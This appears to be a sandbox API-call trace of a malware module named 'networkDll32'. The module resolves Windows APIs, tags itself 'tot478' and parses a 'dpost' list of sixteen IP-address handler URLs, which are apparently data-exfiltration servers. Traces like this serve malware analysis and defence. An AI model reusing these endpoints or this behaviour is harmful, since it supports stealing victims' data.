	[0215.319] ResetEvent (hEvent=0x8) returned 1
	[0215.319] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.321] LoadLibraryW (lpLibFileName="KERNEL32.dll") returned 0x76b10000
	[0215.322] ResetEvent (hEvent=0x8) returned 1
	[0215.322] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.324] GetProcAddress (hModule=0x76b10000, lpProcName="CloseHandle") returned 0x76b5ca7c
	[0215.324] ResetEvent (hEvent=0x8) returned 1
	[0215.324] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.327] GetProcAddress (hModule=0x76b10000, lpProcName="Process32FirstW") returned 0x76b4fa35
	[0215.327] ResetEvent (hEvent=0x8) returned 1
	[0215.327] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.330] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThread") returned 0x76b6375d
	[0215.330] ResetEvent (hEvent=0x8) returned 1
	[0215.330] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.377] GetProcAddress (hModule=0x76b10000, lpProcName="DeleteCriticalSection") returned 0x77389ac5
	[0215.377] ResetEvent (hEvent=0x8) returned 1
	[0215.377] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.380] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcatA") returned 0x76b5a19f
	[0215.380] ResetEvent (hEvent=0x8) returned 1
	[0215.380] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.383] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcpyA") returned 0x76b59793
	[0215.383] ResetEvent (hEvent=0x8) returned 1
	[0215.383] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.386] GetProcAddress (hModule=0x76b10000, lpProcName="TerminateThread") returned 0x76b622a7
	[0215.386] ResetEvent (hEvent=0x8) returned 1
	[0215.386] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.389] GetProcAddress (hModule=0x76b10000, lpProcName="GetSystemDirectoryA") returned 0x76b58fc5
	[0215.389] ResetEvent (hEvent=0x8) returned 1
	[0215.389] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.392] GetProcAddress (hModule=0x76b10000, lpProcName="Process32NextW") returned 0x76b4faca
	[0215.392] ResetEvent (hEvent=0x8) returned 1
	[0215.392] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.395] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleOutputCP") returned 0x76bbe210
	[0215.395] ResetEvent (hEvent=0x8) returned 1
	[0215.395] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.400] GetProcAddress (hModule=0x76b10000, lpProcName="CreateProcessA") returned 0x76b12082
	[0215.400] ResetEvent (hEvent=0x8) returned 1
	[0215.400] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.403] GetProcAddress (hModule=0x76b10000, lpProcName="HeapCreate") returned 0x76b63ea2
	[0215.403] ResetEvent (hEvent=0x8) returned 1
	[0215.403] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.406] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleA") returned 0x76b5cf41
	[0215.406] ResetEvent (hEvent=0x8) returned 1
	[0215.406] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.409] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryA") returned 0x76b6395c
	[0215.409] ResetEvent (hEvent=0x8) returned 1
	[0215.409] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.412] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.412] ResetEvent (hEvent=0x8) returned 1
	[0215.412] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.455] GetProcAddress (hModule=0x76b10000, lpProcName="HeapFree") returned 0x76b5bbd0
	[0215.455] ResetEvent (hEvent=0x8) returned 1
	[0215.455] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.458] GetProcAddress (hModule=0x76b10000, lpProcName="lstrlenW") returned 0x76b5d9e8
	[0215.458] ResetEvent (hEvent=0x8) returned 1
	[0215.458] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.461] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcpynW") returned 0x76b76118
	[0215.461] ResetEvent (hEvent=0x8) returned 1
	[0215.461] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.464] GetProcAddress (hModule=0x76b10000, lpProcName="MultiByteToWideChar") returned 0x76b6452b
	[0215.464] ResetEvent (hEvent=0x8) returned 1
	[0215.464] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.467] GetProcAddress (hModule=0x76b10000, lpProcName="HeapAlloc") returned 0x77382dd6
	[0215.467] ResetEvent (hEvent=0x8) returned 1
	[0215.467] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.470] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcessHeap") returned 0x76b61280
	[0215.470] ResetEvent (hEvent=0x8) returned 1
	[0215.470] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.473] GetProcAddress (hModule=0x76b10000, lpProcName="lstrlenA") returned 0x76b5a611
	[0215.473] ResetEvent (hEvent=0x8) returned 1
	[0215.473] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.476] GetProcAddress (hModule=0x76b10000, lpProcName="HeapReAlloc") returned 0x7739ff51
	[0215.476] ResetEvent (hEvent=0x8) returned 1
	[0215.476] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.479] GetProcAddress (hModule=0x76b10000, lpProcName="ReadFile") returned 0x76b596fb
	[0215.479] ResetEvent (hEvent=0x8) returned 1
	[0215.479] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.482] GetProcAddress (hModule=0x76b10000, lpProcName="SetHandleInformation") returned 0x76b48856
	[0215.482] ResetEvent (hEvent=0x8) returned 1
	[0215.482] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.485] GetProcAddress (hModule=0x76b10000, lpProcName="EnterCriticalSection") returned 0x773777a0
	[0215.485] ResetEvent (hEvent=0x8) returned 1
	[0215.485] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.488] GetProcAddress (hModule=0x76b10000, lpProcName="LeaveCriticalSection") returned 0x77377760
	[0215.488] ResetEvent (hEvent=0x8) returned 1
	[0215.488] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.521] GetProcAddress (hModule=0x76b10000, lpProcName="CreatePipe") returned 0x76b735b7
	[0215.521] ResetEvent (hEvent=0x8) returned 1
	[0215.521] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.524] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSection") returned 0x7738a149
	[0215.524] ResetEvent (hEvent=0x8) returned 1
	[0215.524] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.527] GetProcAddress (hModule=0x76b10000, lpProcName="PeekNamedPipe") returned 0x76b9f74b
	[0215.527] ResetEvent (hEvent=0x8) returned 1
	[0215.527] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.531] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForSingleObject") returned 0x76b5ba90
	[0215.531] ResetEvent (hEvent=0x8) returned 1
	[0215.531] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.534] GetProcAddress (hModule=0x76b10000, lpProcName="FreeLibraryAndExitThread") returned 0x76b4fdb8
	[0215.534] ResetEvent (hEvent=0x8) returned 1
	[0215.534] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.537] GetProcAddress (hModule=0x76b10000, lpProcName="GetLastError") returned 0x76b5bf00
	[0215.537] ResetEvent (hEvent=0x8) returned 1
	[0215.537] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.540] GetProcAddress (hModule=0x76b10000, lpProcName="ExitThread") returned 0x7735f611
	[0215.540] ResetEvent (hEvent=0x8) returned 1
	[0215.540] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.543] GetProcAddress (hModule=0x76b10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76b4f731
	[0215.543] ResetEvent (hEvent=0x8) returned 1
	[0215.543] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.545] GetProcAddress (hModule=0x76b10000, lpProcName="Sleep") returned 0x76b5ba46
	[0215.545] ResetEvent (hEvent=0x8) returned 1
	[0215.545] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.548] GetProcAddress (hModule=0x76b10000, lpProcName="WideCharToMultiByte") returned 0x76b6450e
	[0215.548] ResetEvent (hEvent=0x8) returned 1
	[0215.548] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.551] LoadLibraryW (lpLibFileName="USER32.dll") returned 0x76c00000
	[0215.551] ResetEvent (hEvent=0x8) returned 1
	[0215.551] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.554] GetProcAddress (hModule=0x76c00000, lpProcName="wsprintfW") returned 0x76c2426d
	[0215.554] ResetEvent (hEvent=0x8) returned 1
	[0215.554] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.557] GetProcAddress (hModule=0x76c00000, lpProcName="wvsprintfA") returned 0x76c13c94
	[0215.557] ResetEvent (hEvent=0x8) returned 1
	[0215.557] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.559] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x76cd0000
	[0215.559] ResetEvent (hEvent=0x8) returned 1
	[0215.560] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.569] GetProcAddress (hModule=0x76cd0000, lpProcName="IIDFromString") returned 0x76ce2ff2
	[0215.569] ResetEvent (hEvent=0x8) returned 1
	[0215.569] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.572] GetProcAddress (hModule=0x76cd0000, lpProcName="CoSetProxyBlanket") returned 0x76ce5ea5
	[0215.572] ResetEvent (hEvent=0x8) returned 1
	[0215.572] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.575] GetProcAddress (hModule=0x76cd0000, lpProcName="CoCreateInstance") returned 0x76d19d0b
	[0215.575] ResetEvent (hEvent=0x8) returned 1
	[0215.575] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.578] GetProcAddress (hModule=0x76cd0000, lpProcName="CoUninitialize") returned 0x76d186d3
	[0215.578] ResetEvent (hEvent=0x8) returned 1
	[0215.578] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.581] GetProcAddress (hModule=0x76cd0000, lpProcName="CoInitializeEx") returned 0x76d109ad
	[0215.581] ResetEvent (hEvent=0x8) returned 1
	[0215.581] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.584] LoadLibraryW (lpLibFileName="OLEAUT32.dll") returned 0x76a60000
	[0215.584] ResetEvent (hEvent=0x8) returned 1
	[0215.584] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.586] GetProcAddress (hModule=0x76a60000, lpProcName=0x9) returned 0x76a63eae
	[0215.586] ResetEvent (hEvent=0x8) returned 1
	[0215.586] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.588] GetProcAddress (hModule=0x76a60000, lpProcName=0xb9) returned 0x76a807cd
	[0215.588] ResetEvent (hEvent=0x8) returned 1
	[0215.588] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.590] GetProcAddress (hModule=0x76a60000, lpProcName=0x5e) returned 0x76a86ba7
	[0215.590] ResetEvent (hEvent=0x8) returned 1
	[0215.590] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.592] GetProcAddress (hModule=0x76a60000, lpProcName=0x6) returned 0x76a63e59
	[0215.592] ResetEvent (hEvent=0x8) returned 1
	[0215.592] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.594] GetProcAddress (hModule=0x76a60000, lpProcName=0x14) returned 0x76a7e173
	[0215.594] ResetEvent (hEvent=0x8) returned 1
	[0215.594] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.595] GetProcAddress (hModule=0x76a60000, lpProcName=0x19) returned 0x76a7ea56
	[0215.595] ResetEvent (hEvent=0x8) returned 1
	[0215.595] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.597] GetProcAddress (hModule=0x76a60000, lpProcName=0x13) returned 0x76a7e127
	[0215.597] ResetEvent (hEvent=0x8) returned 1
	[0215.597] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.598] GetProcAddress (hModule=0x76a60000, lpProcName=0x8) returned 0x76a63ed5
	[0215.598] ResetEvent (hEvent=0x8) returned 1
	[0215.598] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.601] ResetEvent (hEvent=0x8) returned 1
	[0215.601] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.602] GetModuleHandleA (lpModuleName="msvcrt.dll") returned 0x76f80000
	[0215.602] GetProcAddress (hModule=0x76f80000, lpProcName="_wtoi") returned 0x76f8c823
	[0215.602] GetProcAddress (hModule=0x76f80000, lpProcName="_snwprintf_s") returned 0x76f9141b
	[0215.603] GetProcAddress (hModule=0x76f80000, lpProcName="_vsnwprintf_s") returned 0x76f913b4
	[0215.603] HeapCreate (flOptions=0x0, dwInitialSize=0x0, dwMaximumSize=0x0) returned 0x17b0000
	[0215.603] lstrcpyA (in: lpString1=0x10006028, lpString2="networkDll32" | out: lpString1="networkDll32") returned="networkDll32"
	[0215.603] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x10f788 | out: lpWSAData=0x10f788) returned 0
	[0215.610] lstrlenA (lpString="tot478") returned 6
	[0215.610] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0xc0100, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6
	[0215.610] GetProcessHeap () returned 0x270000
	[0215.610] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xc) returned 0x284d78
	[0215.610] lstrlenA (lpString="tot478") returned 6
	[0215.610] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0xc0100, cbMultiByte=6, lpWideCharStr=0x284d78, cchWideChar=6 | out: lpWideCharStr="tot478n") returned 6
	[0215.610] GetProcessHeap () returned 0x270000
	[0215.610] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x284d78 | out: hHeap=0x270000) returned 1
	[0215.610] lstrlenA (lpString="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611") returned 49
	[0215.610] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0xc0000, cbMultiByte=49, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49
	[0215.610] GetProcessHeap () returned 0x270000
	[0215.610] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x62) returned 0x28d6f0
	[0215.610] lstrlenA (lpString="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611") returned 49
	[0215.610] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0xc0000, cbMultiByte=49, lpWideCharStr=0x28d6f0, cchWideChar=49 | out: lpWideCharStr="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611-93菿痗᳟") returned 49
	[0215.610] GetProcessHeap () returned 0x270000
	[0215.610] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x28d6f0 | out: hHeap=0x270000) returned 1
	[0215.610] SetConsoleOutputCP (wCodePageID=0xfde9) returned 0
	[0215.610] ResetEvent (hEvent=0x8) returned 1
	[0215.610] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0217.162] GetProcessHeap () returned 0x270000
	[0217.162] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x8) returned 0x28d6f0
	[0217.162] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x250000, cbMultiByte=747, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 747
	[0217.162] GetProcessHeap () returned 0x270000
	[0217.162] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x5d8) returned 0x28d700
	[0217.162] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x250000, cbMultiByte=747, lpWideCharStr=0x28d700, cchWideChar=748 | out: lpWideCharStr="<dpost>\r\n<handler>http://186.159.1.217:8082</handler>\r\n<handler>http://186.10.243.70:8082</handler>\r\n<handler>http://75.183.130.158:8082</handler>\r\n<handler>http://186.183.151.194:8082</handler>\r\n<handler>http://181.129.160.10:8082</handler>\r\n<handler>http://181.57.97.138:80</handler>\r\n<handler>http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n") returned 747
	[0217.162] lstrlenW (lpString="handler>") returned 8
	[0217.162] lstrlenW (lpString="/handler>") returned 9
	[0217.162] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://186.159.1.217:8082</handler>\r\n<handler>http://186.10.243.70:8082</handler>\r\n<handler>http://75.183.130.158:8082</handler>\r\n<handler>http://186.183.151.194:8082</handler>\r\n<handler>http://181.129.160.10:8082</handler>\r\n<handler>http://181.57.97.138:80</handler>\r\n<handler>http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=26 | out: lpString1="http://186.159.1.217:8082") returned="http://186.159.1.217:8082"
	[0217.162] GetProcessHeap () returned 0x270000
	[0217.162] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x28dce0
	[0217.163] lstrlenW (lpString="ttps://") returned 7
	[0217.163] lstrlenW (lpString="//") returned 2
	[0217.163] lstrlenW (lpString="") returned 0
	[0217.163] _wtoi (_String="8082") returned 8082
	[0217.163] lstrcpynW (in: lpString1=0x28dce4, lpString2="186.159.1.217:8082", iMaxLength=14 | out: lpString1="186.159.1.217") returned="186.159.1.217"
	[0217.163] lstrlenW (lpString="handler>") returned 8
	[0217.163] lstrlenW (lpString="/handler>") returned 9
	[0217.163] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://186.10.243.70:8082</handler>\r\n<handler>http://75.183.130.158:8082</handler>\r\n<handler>http://186.183.151.194:8082</handler>\r\n<handler>http://181.129.160.10:8082</handler>\r\n<handler>http://181.57.97.138:80</handler>\r\n<handler>http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=26 | out: lpString1="http://186.10.243.70:8082") returned="http://186.10.243.70:8082"
	[0217.163] GetProcessHeap () returned 0x270000
	[0217.163] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x28e4f8
	[0217.163] lstrlenW (lpString="ttps://") returned 7
	[0217.163] lstrlenW (lpString="//") returned 2
	[0217.163] lstrlenW (lpString="") returned 0
	[0217.163] _wtoi (_String="8082") returned 8082
	[0217.163] lstrcpynW (in: lpString1=0x28e4fc, lpString2="186.10.243.70:8082", iMaxLength=14 | out: lpString1="186.10.243.70") returned="186.10.243.70"
	[0217.163] lstrlenW (lpString="handler>") returned 8
	[0217.163] lstrlenW (lpString="/handler>") returned 9
	[0217.163] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://75.183.130.158:8082</handler>\r\n<handler>http://186.183.151.194:8082</handler>\r\n<handler>http://181.129.160.10:8082</handler>\r\n<handler>http://181.57.97.138:80</handler>\r\n<handler>http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=27 | out: lpString1="http://75.183.130.158:8082") returned="http://75.183.130.158:8082"
	[0217.163] GetProcessHeap () returned 0x270000
	[0217.163] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x28ed10
	[0217.163] lstrlenW (lpString="ttps://") returned 7
	[0217.163] lstrlenW (lpString="//") returned 2
	[0217.163] lstrlenW (lpString="") returned 0
	[0217.163] _wtoi (_String="8082") returned 8082
	[0217.163] lstrcpynW (in: lpString1=0x28ed14, lpString2="75.183.130.158:8082", iMaxLength=15 | out: lpString1="75.183.130.158") returned="75.183.130.158"
	[0217.163] lstrlenW (lpString="handler>") returned 8
	[0217.163] lstrlenW (lpString="/handler>") returned 9
	[0217.163] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://186.183.151.194:8082</handler>\r\n<handler>http://181.129.160.10:8082</handler>\r\n<handler>http://181.57.97.138:80</handler>\r\n<handler>http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=28 | out: lpString1="http://186.183.151.194:8082") returned="http://186.183.151.194:8082"
	[0217.163] GetProcessHeap () returned 0x270000
	[0217.163] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x28f528
	[0217.163] lstrlenW (lpString="ttps://") returned 7
	[0217.163] lstrlenW (lpString="//") returned 2
	[0217.163] lstrlenW (lpString="") returned 0
	[0217.163] _wtoi (_String="8082") returned 8082
	[0217.163] lstrcpynW (in: lpString1=0x28f52c, lpString2="186.183.151.194:8082", iMaxLength=16 | out: lpString1="186.183.151.194") returned="186.183.151.194"
	[0217.163] lstrlenW (lpString="handler>") returned 8
	[0217.163] lstrlenW (lpString="/handler>") returned 9
	[0217.163] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://181.129.160.10:8082</handler>\r\n<handler>http://181.57.97.138:80</handler>\r\n<handler>http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=27 | out: lpString1="http://181.129.160.10:8082") returned="http://181.129.160.10:8082"
	[0217.163] GetProcessHeap () returned 0x270000
	[0217.163] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x28fd40
	[0217.164] lstrlenW (lpString="ttps://") returned 7
	[0217.164] lstrlenW (lpString="//") returned 2
	[0217.164] lstrlenW (lpString="") returned 0
	[0217.164] _wtoi (_String="8082") returned 8082
	[0217.164] lstrcpynW (in: lpString1=0x28fd44, lpString2="181.129.160.10:8082", iMaxLength=15 | out: lpString1="181.129.160.10") returned="181.129.160.10"
	[0217.164] lstrlenW (lpString="handler>") returned 8
	[0217.164] lstrlenW (lpString="/handler>") returned 9
